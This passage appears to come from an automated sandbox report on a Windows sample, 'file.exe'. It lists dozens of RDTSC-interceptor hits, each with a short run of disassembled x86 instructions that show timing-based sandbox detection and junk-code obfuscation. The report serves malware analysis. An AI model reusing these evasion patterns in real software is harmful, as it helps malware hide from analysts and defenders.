0x00000068 pushad 0x00000069 sub ax, BFBAh 0x0000006e sbb edx, 54EC89E5h 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007FA67D08029Ah 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jnc 00007FA67D0802AEh 0x00000088 push eax 0x00000089 pushad 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83175E second address: 83176A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FA67C81A866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83176A second address: 831780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FA67D080296h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83844E second address: 838457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838457 second address: 83848B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA67D0802A2h 0x00000008 jmp 00007FA67D08029Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jl 00007FA67D0802A9h 0x00000016 jmp 00007FA67D0802A3h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83848B second address: 838495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA67C81A866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838495 second address: 838499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83875E second address: 838762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838762 second address: 838766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838766 second address: 838777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA67C81A866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8388B3 second address: 8388D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FA67D0802A3h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8388D0 second address: 8388FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A86Dh 0x00000009 jnp 00007FA67C81A866h 0x0000000f jmp 00007FA67C81A86Ch 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8388FD second address: 838901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838901 second address: 838905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838905 second address: 838915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA67D08029Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838915 second address: 838926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA67C81A86Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838C35 second address: 838C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838D85 second address: 838D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 838D8B second address: 838DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jg 00007FA67D0802ACh 0x0000000d pushad 0x0000000e jnp 00007FA67D080296h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AF6F second address: 83AFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 add dword ptr [esp], 367CCD32h 0x0000000d mov dword ptr [ebp+122D2795h], edi 0x00000013 push 00000003h 0x00000015 mov esi, dword ptr [ebp+122D38C0h] 0x0000001b push 00000000h 0x0000001d xor dword ptr [ebp+122D29C3h], ecx 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FA67C81A868h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f adc cx, 15B3h 0x00000044 push ABFB93ABh 0x00000049 push ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83B194 second address: 83B19A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83B19A second address: 83B1AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83B1AA second address: 83B1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83B1B4 second address: 83B1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82E02D second address: 82E031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82E031 second address: 82E035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82E035 second address: 82E052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA67D0802A7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859CF7 second address: 859D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A86Ah 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FA67C81A870h 0x00000014 jo 00007FA67C81A866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859FC0 second address: 859FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D0802A8h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FA67D080296h 0x00000013 jmp 00007FA67D0802A7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859FFD second address: 85A02A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A870h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA67C81A875h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A40C second address: 85A410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A733 second address: 85A739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A739 second address: 85A73F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A73F second address: 85A74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85A74F second address: 85A759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA67D080296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84F1DE second address: 84F1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84F1E5 second address: 84F1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84F1EB second address: 84F1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85AE04 second address: 85AE0E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA67D08029Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85DCCD second address: 85DCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85DCD1 second address: 85DCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85DCD5 second address: 85DCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85DCDB second address: 85DCE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85EE34 second address: 85EE5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jnc 00007FA67C81A868h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85EE5E second address: 85EE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85EE68 second address: 85EE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 jmp 00007FA67C81A86Fh 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 pushad 0x00000015 jmp 00007FA67C81A86Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82C5B7 second address: 82C5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869275 second address: 8692A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67C81A86Bh 0x00000009 jmp 00007FA67C81A870h 0x0000000e popad 0x0000000f push edx 0x00000010 jmp 00007FA67C81A86Ch 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 869408 second address: 86940F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B3A5 second address: 86B3AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B40B second address: 86B41E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA67D080296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FA67D080296h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B41E second address: 86B496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 6E87071Ch 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA67C81A868h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 add esi, dword ptr [ebp+122D3804h] 0x0000002d mov dword ptr [ebp+122D2587h], edi 0x00000033 mov esi, eax 0x00000035 call 00007FA67C81A869h 0x0000003a push edx 0x0000003b push edi 0x0000003c jmp 00007FA67C81A879h 0x00000041 pop edi 0x00000042 pop edx 0x00000043 push eax 0x00000044 pushad 0x00000045 jmp 00007FA67C81A874h 0x0000004a push esi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B496 second address: 86B4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b jmp 00007FA67D0802A6h 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA67D0802A7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B4D3 second address: 86B4DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B4DA second address: 86B4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jc 00007FA67D0802A4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B4EE second address: 86B4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B604 second address: 86B608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B85D second address: 86B867 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA67C81A86Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86BAD3 second address: 86BAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86BC30 second address: 86BC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C487 second address: 86C48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C48D second address: 86C492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C5ED second address: 86C637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FA67D0802A3h 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 ja 00007FA67D08029Ch 0x00000016 jmp 00007FA67D0802A8h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86C637 second address: 86C63D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CAF6 second address: 86CB5D instructions: 0x00000000 rdtsc 0x00000002 je 00007FA67D080298h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA67D08029Eh 0x00000012 nop 0x00000013 sbb di, 1E44h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FA67D080298h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 jmp 00007FA67D0802A1h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D2B8Ch], edi 0x00000041 xchg eax, ebx 0x00000042 jnp 00007FA67D08029Eh 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CB5D second address: 86CB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jc 00007FA67C81A878h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86CB6D second address: 86CB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86E510 second address: 86E5AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push edi 0x0000000e pop esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FA67C81A868h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b call 00007FA67C81A879h 0x00000030 mov dword ptr [ebp+122D1C79h], edi 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FA67C81A868h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 push edi 0x00000054 call 00007FA67C81A876h 0x00000059 mov si, ax 0x0000005c pop esi 0x0000005d pop esi 0x0000005e mov si, 3A56h 0x00000062 xchg eax, ebx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86E5AB second address: 86E5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F103 second address: 86F108 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86EDFC second address: 86EE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F108 second address: 86F11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA67C81A86Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86EE00 second address: 86EE16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86EE16 second address: 86EE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86EE1A second address: 86EE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F920 second address: 86F924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F924 second address: 86F938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87083D second address: 87085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87085D second address: 870861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 870861 second address: 8708D1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jno 00007FA67C81A866h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FA67C81A868h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e jno 00007FA67C81A86Ch 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FA67C81A868h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1F49h], edx 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8708D1 second address: 8708D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 872DF1 second address: 872DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 871C9E second address: 871CB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D08029Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 873431 second address: 873436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 873436 second address: 87343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87343C second address: 873448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 877C6B second address: 877C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 877C6F second address: 877C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
